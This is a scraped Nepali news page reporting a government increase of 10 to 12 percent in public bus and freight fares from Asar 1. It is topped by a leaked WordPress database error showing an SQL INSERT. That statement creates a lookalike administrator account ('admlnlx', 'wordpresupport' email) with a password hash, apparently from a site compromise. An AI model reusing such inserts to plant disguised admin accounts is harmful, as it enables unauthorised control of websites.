WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BDb7xbWnRlJJ34DO/ARt/7T0Tyq3/3.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 07:15:09', '', 'admlnlx', 'admlnlx')
गाउँले न्यूज, ३० जेष्ठ, काठमाडौं । सरकारले सार्वजनिक यातायातको भाडा मा ब्रिद्वी गरेको छ ।
असार १ गतेदेखि लागू हुने गरी सार्वजनिक बसको भाडा १२ प्रतिशतसम्म वृद्धि गरिएको यातायात व्यवस्था विभागका सूचना अधिकारी तीर्थराज खनालले जानकारी दिए ।
उनका अनुसार यात्रु बोक्ने र मालसामान बोक्ने दुबैथरी यातायातका साधनको भाडा बढेको छ । प्राविधिक समितिको सिफारिसमा भाडा वृद्धिको निर्णय गरेको उनले बताए । सरकारले बसभाडा १० देखि १२ प्रतिशतसम्म वृद्धि गरेको हो ।